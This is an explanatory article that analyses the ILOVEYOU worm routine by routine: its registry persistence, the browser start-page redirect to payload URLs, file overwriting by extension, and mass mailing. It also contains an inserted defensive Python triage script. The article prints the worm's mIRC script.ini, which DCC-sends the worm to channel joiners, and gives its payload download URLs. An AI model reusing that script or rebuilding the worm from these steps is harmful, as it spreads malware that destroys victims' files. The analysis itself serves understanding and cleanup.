
ILOVEYOU: Line for Line

Even though we've had the source to ILOVEYOU for some time, we are not about to publish it, and for obvious reasons. But we will explain how it works, code line for code line. Anyone should be able to follow this, for after all, Visual Basic is a kiddies language.

The worm is made up of the following routines: main, regruns, listadriv, infectfiles, folderlist, regcreate, regget, fileexist, folderexist, spreadtoemail, and html. Before anything else, the worm opens its own file for reading, so that it has its source text at hand for the copies it makes, and then calls main.

main()

  1. Set HKCU\Software\Microsoft\Windows Scripting Host\Settings\Timeout to 0.
  2. Get the locations of the Windows, system, and TEMP directories and store these paths at global scope.
  3. Copy itself to MSKernel32.vbs in the system directory.
  4. Copy itself to Win32DLL.vbs in the Windows directory.
  5. Copy itself to LOVE-LETTER-FOR-YOU.TXT.vbs in the system directory.
  6. Call the following subroutines in this order:

    • regruns
    • html
    • spreadtoemail
    • listadriv

regruns()

  1. Create the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32.
  2. Give it the default value of the full path to MSKernel32.vbs.
  3. Create the key HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL.
  4. Give it the default value of the full path to Win32DLL.vbs.
  5. Read HKCU\Software\Microsoft\Internet Explorer\Download Directory. If this path does not exist, set it now to C:\.
  6. Set the Start Page key
    HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
    at random to one of:
    http://www.skyinet.net/~young1s/.../WIN-BUGSFIX.exe
    http://www.skyinet.net/~angelcat/.../WIN-BUGSFIX.exe
    http://www.skyinet.net/~koichi/.../WIN-BUGSFIX.exe
    http://www.skyinet.net/~chu/.../WIN-BUGSFIX.exe
  7. Search for the file WIN-BUGSFIX.exe in the download directory. If it exists, create the key
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
    and set its value to <download directory>\WIN-BUGSFIX.exe; then reset
    HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
    to about:blank.

listadriv()

This routine calls folderlist for all fixed drives found, either local or remote.

infectfiles()

This routine takes a folder argument and then walks through all files found in that folder. It gets the extension of each file and makes a lower case copy of the extension. If the extension is either 'vbe' or 'vbs' it:

  1. Opens the file for writing and copies itself to it.
  2. Closes the file.

If the extension is either 'js', 'jse', 'css', 'wsh', 'sct', or 'hta' it:

  1. Opens the file for writing and copies itself to it.
  2. Closes the file.
  3. Gets the name of the file (without extension).
  4. Creates a new file with 'vbs' added to the name.
  5. Copies itself to this new file.
  6. Deletes the original file.

If the extension is either 'jpg' or 'jpeg' it:

  1. Opens the file for writing and copies itself to it.
  2. Closes the file.
  3. Creates a new file with the 'vbs' extension tagged on and copies the (now infected) file to it.
  4. Deletes the original file.

If the extension is either 'mp3' or 'mp2' it:

  1. Creates a new file with the same name and the 'vbs' extension tagged on.
  2. Copies itself to this new file.
  3. Adds the 'Hidden' attribute to the original file.

It now checks if the current file name is 'mirc32.exe', 'mlink32.exe', 'mirc.ini', 'script.ini', or 'mirc.hlp'. If it is, it creates (overwrites) the file 'script.ini' and gives it the following contents:

[script]
;mIRC Script
;  Please dont edit this script... mIRC will corrupt, if mIRC will
;  corrupt... WINDOWS will affect and will not run correctly. thanks
;
;Khaled Mardam-Bey
;http://www.mirc.com
;
n0=on 1:JOIN:#:{
n1=  /if ( $nick == $me ) { halt }
n2=  /.dcc send $nick <system directory>\LOVE-LETTER-FOR-YOU.HTM
n3=}

And then closes the file.
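Added example (not code from the original article or from the worm): a Python triage script that walks a folder tree for the leftovers described above, classifying each <name>.<ext>.vbs by the rule that applied to <ext> (overwritten and deleted, or kept hidden beside the copy) and flagging a script.ini that carries the DCC-send line. The directory it builds in build_sample_tree() is a constructed stand-in with harmless placeholder contents.

```python
import os
import tempfile
# Overwritten with the worm, renamed <name>.<ext>.vbs, original then deleted.
DESTROYED_EXTS = {".jpg", ".jpeg", ".js", ".jse", ".css", ".wsh", ".sct", ".hta"}
# Original kept in place (marked Hidden) beside a new <name>.<ext>.vbs copy.
HIDDEN_EXTS = {".mp3", ".mp2"}
DCC_MARKER, HTM_MARKER = "/.dcc send $nick", "LOVE-LETTER-FOR-YOU.HTM"

def classify_vbs(dirpath, name):
    """Verdict for a .vbs file, or None if its name does not fit the pattern."""
    base = os.path.splitext(name)[0]               # drop the trailing .vbs
    inner_ext = os.path.splitext(base)[1].lower()  # extension in front of it
    if inner_ext in DESTROYED_EXTS:
        return "worm copy; original overwritten and deleted, restore from backup"
    if inner_ext in HIDDEN_EXTS:
        kept = os.path.exists(os.path.join(dirpath, base))
        return "worm copy; hidden original kept, recoverable" if kept else "worm copy; original missing"
    return None

def triage(root):
    """Return {relative path: verdict} for every suspicious file under root."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            if name.lower().endswith(".vbs"):
                verdict = classify_vbs(dirpath, name)
                if verdict:
                    findings[rel] = verdict
            elif name.lower() == "script.ini":
                with open(os.path.join(root, rel), errors="replace") as fh:
                    text = fh.read()
                if DCC_MARKER in text and HTM_MARKER in text:
                    findings[rel] = "mIRC script.ini rewritten to DCC-send the worm's HTM"
    return findings

def build_sample_tree():
    """Constructed stand-in for an infected folder (no worm code inside)."""
    root = tempfile.mkdtemp()
    samples = {
        "photo.jpg.vbs": "' stand-in for worm body\n",
        "song.mp3": "stand-in audio bytes\n",
        "song.mp3.vbs": "' stand-in for worm body\n",
        "script.ini": "[script]\nn2=  /.dcc send $nick C:\\WINDOWS\\SYSTEM\\LOVE-LETTER-FOR-YOU.HTM\n",
    }
    for name, text in samples.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(text)
    return root
```

Running triage() over a real drive root gives the responder two lists at once: files to restore from backup and files that only need the Hidden attribute cleared.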

folderlist()

This routine takes a folder argument, gets the path to the folder, gets a list of all sub-folders to the folder, and calls infectfiles and then itself recursively for each sub-folder found.

regcreate()

This routine takes two arguments, a Registry key and a Registry value, and sets the value at the key through a native API.

regget()

This function takes a Registry path ending in a value as an argument and returns the value at the path given.

fileexist()

This function takes a file name as an argument, passes it to a native file-exists API and returns that API's result.

folderexist()

This function works the same way as the function above.

spreadtoemail()

This routine runs through the MAPI namespace looking for address lists. It also accesses the Windows Address Book Registry key at:

HKCU\Software\Microsoft\WAB

For each address list entry found it:

  1. Creates a new message destined for the Outbox.
  2. Adds the address found to the message.
  3. Sets the subject line to 'ILOVEYOU'.
  4. Sets the body of the message to:
    '[CRLF]kindly check the attached LOVELETTER coming from me.'
  5. Adds the attachment LOVE-LETTER-FOR-YOU.TXT.vbs already copied to the system directory.
  6. Sends the message.
  7. Makes a note at HKCU\Software\Microsoft\WAB that the message has been sent.

Finally, it stores the address count at the same Registry key.

html()

It is this routine that creates the HTML file sent to IRC chat channels. It is a bit more sophisticated than the email version. It contains the message 'simple but I think it is good' and the message:

This HTML file need ActiveX Control -
To Enable to read this HTML file -
Please press 'YES' button to Enable ActiveX

It also adds an infinitely looping MARQUEE, an IE-specific element. The file, if activated, maximizes the window, creates the file MSKernel32.vbs in the system directory on the local machine, copies itself to this file, and then attempts to activate it. If it cannot be activated, it issues the message box:

can't initialize ActiveX

It then sets the key

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32

with the value of the full path of MSKernel32.vbs.

It then creates the file LOVE-LETTER-FOR-YOU.HTM in the system directory on the recipient's machine.

Copyright © Radsoft. All rights reserved.